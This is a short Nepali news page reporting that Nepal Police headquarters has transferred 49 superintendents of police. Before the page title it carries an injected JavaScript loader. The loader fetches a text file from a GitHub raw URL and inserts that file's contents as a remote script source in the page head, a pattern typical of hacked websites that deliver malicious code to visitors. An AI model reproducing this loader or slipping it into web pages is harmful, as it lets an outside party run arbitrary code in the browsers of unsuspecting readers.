;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ४९ एसपीहरुको सरुवा – जुनेली न्युज
मङ्लबार, साउन १, २०८२
अर्थ/वाणिज्य

४९ एसपीहरुको सरुवा

भदौ ०४,

काठमाडौं । नेपाल प्रहरीका ४९ एसपी (प्रहरी उपरीक्षक) को सरुवा गरिएको छ ।  प्रहरी प्रधान कार्यालयले बिहीबार सूचना जारी गरी प्रहरी महानिरीक्षकको निर्णयानुसार एसपीहरूको सरुवा गरिएको जानकारी दिएको हो ।

 

सरुवा भएका सबै एसपीलाई भदौ महिनाको तलब सम्बन्धित जिल्लाबाटै दिइने सूचनामा उल्लेख गरिएकाे छ ।

फेसबुक प्रतिक्रियाहरु